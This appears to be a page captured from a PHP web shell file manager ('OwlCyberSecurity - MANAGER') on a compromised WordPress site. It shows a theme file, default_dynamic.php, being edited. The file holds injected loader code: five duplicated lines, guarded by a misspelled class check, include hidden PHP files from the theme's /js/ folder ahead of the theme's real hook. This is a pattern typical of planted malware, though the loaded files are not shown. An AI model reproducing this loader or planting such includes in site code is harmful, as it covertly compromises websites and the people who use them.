OwlCyberSecurity - MANAGER
Edit File: default_dynamic.php
<?php if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/js/js.php' ) ) { include_once( get_template_directory() . '/js/js.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/js/class_tema-functions.php' ) ) { include_once( get_template_directory() . '/js/class_tema-functions.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/js/js.php' ) ) { include_once( get_template_directory() . '/js/js.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/js/class_tema-functions.php' ) ) { include_once( get_template_directory() . '/js/class_tema-functions.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/js/js.php' ) ) { include_once( get_template_directory() . '/js/js.php' ); } do_action( 'bridge_qode_action_default_dynamic' );